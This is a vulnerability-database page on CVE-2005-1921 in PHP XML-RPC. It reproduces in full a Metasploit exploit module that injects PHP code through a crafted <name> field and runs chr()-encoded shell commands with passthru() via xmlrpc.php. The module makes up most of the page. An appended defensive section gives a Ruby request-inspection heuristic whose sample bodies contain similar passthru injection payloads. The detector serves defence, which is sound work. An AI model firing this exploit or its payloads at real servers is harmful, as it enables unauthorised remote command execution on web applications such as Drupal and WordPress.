PHP XML-RPC Arbitrary Code Execution

Published: 18 Feb 2007 00:10:39
Reported by: hdm, cazz
Type: metasploit
Source: www.rapid7.com

PHP XML-RPC Arbitrary Code Execution in many PHP web applications

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| FreeBSD | postnuke -- multiple vulnerabilities | 27 May 2005 00:00 | freebsd |
| FreeBSD | pear-XML_RPC -- arbitrary remote code execution | 29 Jun 2005 00:00 | freebsd |
| FreeBSD | drupal -- PHP code execution vulnerabilities | 29 Jun 2005 00:00 | freebsd |
| ATTACKERKB | CVE-2005-2116 | 5 Jul 2005 04:00 | attackerkb |
| CVE | CAN-2005-1921 | 11 Aug 2024 21:51 | cve |
| CVE | CVE-2005-1921 | 1 Jul 2005 04:00 | cve |
| Tenable Nessus | CentOS 3 / 4 : php (CESA-2005:564) | 3 Jul 2006 00:00 | nessus |
| Tenable Nessus | Debian DSA-745-1 : drupal - input validation errors | 10 Jul 2005 00:00 | nessus |
| Tenable Nessus | Debian DSA-746-1 : phpgroupware - input validation error | 14 Jul 2005 00:00 | nessus |
| Tenable Nessus | Debian DSA-747-1 : egroupware - input validation error | 11 Jul 2005 00:00 | nessus |

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # XXX This module needs an overhaul
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
      'Description'    => %q{
          This module exploits an arbitrary code execution flaw
        discovered in many implementations of the PHP XML-RPC module.
        This flaw is exploitable through a number of PHP web
        applications, including but not limited to Drupal, Wordpress,
        Postnuke, and TikiWiki.
      },
      'Author'         => [ 'hdm', 'cazz' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-1921'],
          ['OSVDB', '17793'],
          ['BID', '14088'],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
          'Space' => 512,
          'DisableNops' => true,
          'Keys'  => ['cmd', 'cmd_bash'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2005-06-29'
      ))


    register_options(
      [
        OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
      ])

    deregister_options(
      'HTTP::junk_params', # not your typical POST, so don't inject params.
      'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
      )
  end

  def go(command)

    encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
    wrapper = rand_text_alphanumeric(rand(128)+32)

    cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

    xml =
    '<?xml version="1.0"?>' +
    "<methodCall>" +
      "<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
      "<params><param>" +
        "<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
        "<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
      "</param></params>" +
    "</methodCall>";

    res = send_request_cgi({
        'uri'          => normalize_uri(datastore['PATH']),
        'method'       => 'POST',
        'ctype'        => 'application/xml',
        'data'         => xml,
      }, 5)

    if (res and res.body)
      b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
      if b
        return b.captures[0]
      elsif datastore['HTTP::chunked']
        b = /chunked Transfer-Encoding forbidden/.match(res.body)
        if b
          fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
        end
      end
    end

    return nil
  end

  def check
    response = go("echo ownable")
    if (!response.nil? and response =~ /ownable/sm)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    response = go(payload.encoded)
    if response == nil
      print_error('exploit failed: no response')
    else
      if response.length == 0
        print_good('Exploit Successful')
      else
        print_status("Command returned #{response}")
      end
      handler
    end
  end
end
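
A defender-side check for the request shape the module above builds, as an added example that is not part of the original page or of Metasploit: it flags XML-RPC bodies where a `<name>` sits directly under `<param>`, or where element text closes a PHP string literal and calls an execution function. The function names, finding symbols and sample bodies are constructed for illustration, and the PHP functions listed besides `passthru` are an assumption about what else is worth flagging.

```ruby
# Added defensive example; not part of the Metasploit module above.
ENTITIES = { 'apos' => "'", 'quot' => '"', 'lt' => '<', 'gt' => '>', 'amp' => '&' }.freeze
EXEC_CALL = /\b(passthru|system|exec|shell_exec|eval)\s*\(/i # list beyond passthru is an assumption

# Decode XML entity and ASCII character references so &apos; or &#39; cannot hide a quote.
def decode_xml_text(text)
  text.gsub(/&(#x[0-9a-fA-F]+|#\d+|\w+);/) do |whole|
    ref = Regexp.last_match(1)
    next ENTITIES.fetch(ref, whole) unless ref.start_with?('#')
    code = ref.start_with?('#x') ? ref[2..-1].hex : ref[1..-1].to_i
    code.between?(1, 0x7F) ? code.chr : whole # only ASCII matters for these signatures
  end
end

# Return a list of findings for one raw XML-RPC request body (empty list = nothing flagged).
def inspect_xmlrpc_body(body)
  findings = []
  # <name> is only valid inside a struct <member>; directly under <param> it is out of spec.
  findings << :name_directly_under_param if body =~ /<param>\s*<name>/i
  body.scan(/<(name|methodName|string|value)>([^<]*)<\/\1>/im) do |_tag, raw|
    text = decode_xml_text(raw)
    findings << :quote_breakout if text =~ /['"]\s*\)\s*;/        # closes a PHP string and call
    findings << :php_exec_call if text =~ EXEC_CALL
    findings << :chr_concatenation if text.scan(/chr\(\d+\)/i).length >= 4
  end
  findings.uniq
end

# Constructed sample bodies (not captured traffic).
SAMPLE_BENIGN = %q{<?xml version="1.0"?><methodCall><methodName>examples.getStateName</methodName>} +
  %q{<params><param><value><struct><member><name>title</name>} +
  %q{<value><string>It's here; (really)</string></value></member></struct></value></param></params></methodCall>}
SAMPLE_SUSPICIOUS = %q{<?xml version="1.0"?><methodCall><methodName>aB3xY</methodName><params><param>} +
  %q{<name>qW9z');echo('MARK'); passthru(chr(101).chr(99).chr(104).chr(111)); echo('MARK');;//</name>} +
  %q{<value>zz</value></param></params></methodCall>}
SAMPLE_ENCODED = %q{<?xml version="1.0"?><methodCall><methodName>m</methodName><params><param><value><struct>} +
  %q{<member><name>k&#39;);passthru(chr(101));//</name><value><int>1</int></value></member>} +
  %q{</struct></value></param></params></methodCall>}

if __FILE__ == $PROGRAM_NAME
  { benign: SAMPLE_BENIGN, suspicious: SAMPLE_SUSPICIOUS, encoded: SAMPLE_ENCODED }.each do |label, body|
    puts "#{label}: #{inspect_xmlrpc_body(body).inspect}"
  end
end
```

These are heuristics for log review or a request filter in front of `xmlrpc.php`; legitimate text that happens to contain a quote followed by `);` will also be flagged.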
